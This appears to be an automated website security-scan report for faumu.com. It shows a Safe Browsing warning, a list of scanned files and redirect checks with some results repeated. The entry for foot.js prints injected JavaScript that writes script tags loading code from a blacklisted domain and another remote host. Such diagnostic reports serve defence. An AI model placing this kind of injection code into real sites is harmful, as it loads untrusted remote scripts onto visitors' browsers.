Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=faumu.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://faumu.com/ | 200 OK Content-Length: 16789 Content-Type: text/html | clean |
http://faumu.com/forumdata/cache/common.js?S7f | 200 OK Content-Length: 58892 Content-Type: application/x-javascript | clean |
http://faumu.com/top4.js | 200 OK Content-Length: 93 Content-Type: application/x-javascript | clean |
http://faumu.com/include/js/slide.js | 200 OK Content-Length: 5276 Content-Type: application/x-javascript | clean |
http://faumu.com/top5.js | 200 OK Content-Length: 93 Content-Type: application/x-javascript | clean |
http://faumu.com/foot.js | 200 OK Content-Length: 1125 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: js.shiwt.com document.writeln("<script src=\"http:\/\/js.shiwt.com\/110.js\"><\/script>"); r = 2; var seed = Math.random(); rnd = Math.ceil(seed * r); switch (rnd) { case 1: document.writeln('<script src="http://js.a3p4.com/page/?s=216895"></script>'); break; case 2: document.writeln('<script src="http://js.a3p4.com/page/?s=216895"></script>'); default: ...[814 bytes skipped]... | ||
http://faumu.com/index.php | 200 OK Content-Length: 16789 Content-Type: text/html | clean |
http://faumu.com/register.php | 200 OK Content-Length: 8857 Content-Type: text/html | clean |
http://faumu.com/logging.php?action=login | 200 OK Content-Length: 9592 Content-Type: text/html | clean |
http://faumu.com/forumdata/cache/md5.js?S7f | 200 OK Content-Length: 4730 Content-Type: application/x-javascript | clean |
http://faumu.com/search.php | 200 OK Content-Length: 9373 Content-Type: text/html | clean |
http://faumu.com/faq.php | 200 OK Content-Length: 9389 Content-Type: text/html | clean |
http://faumu.com/misc.php?action=nav | 200 OK Content-Length: 7925 Content-Type: text/html | clean |
http://faumu.com/pm.php?filter=newpm | 200 OK Content-Length: 6766 Content-Type: text/html | clean |
http://faumu.com/pm.php?filter=announcepm | 200 OK Content-Length: 6766 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: faumu.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 19:33:55 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: HUa_lastrequest=63e0tSLK%2BgOe4%2BXm%2BPCsmGWDjlNyfqpuP4yp9ThedeKnKW3SLxwk; path=/; httponly
Set-Cookie: HUa_sid=di378F; expires=Wed, 28-Jan-2015 19:33:54 GMT; path=/; httponly
X-Powered-By: PHP/5.2.17p1
GET / HTTP/1.1
Host: faumu.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 19:33:55 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: HUa_lastrequest=63e0tSLK%2BgOe4%2BXm%2BPCsmGWDjlNyfqpuP4yp9ThedeKnKW3SLxwk; path=/; httponly
Set-Cookie: HUa_sid=di378F; expires=Wed, 28-Jan-2015 19:33:54 GMT; path=/; httponly
X-Powered-By: PHP/5.2.17p1
Second query (visit from search engine):
GET / HTTP/1.1
Host: faumu.com
Referer: http://www.google.com/search?q=faumu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: faumu.com
Referer: http://www.google.com/search?q=faumu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.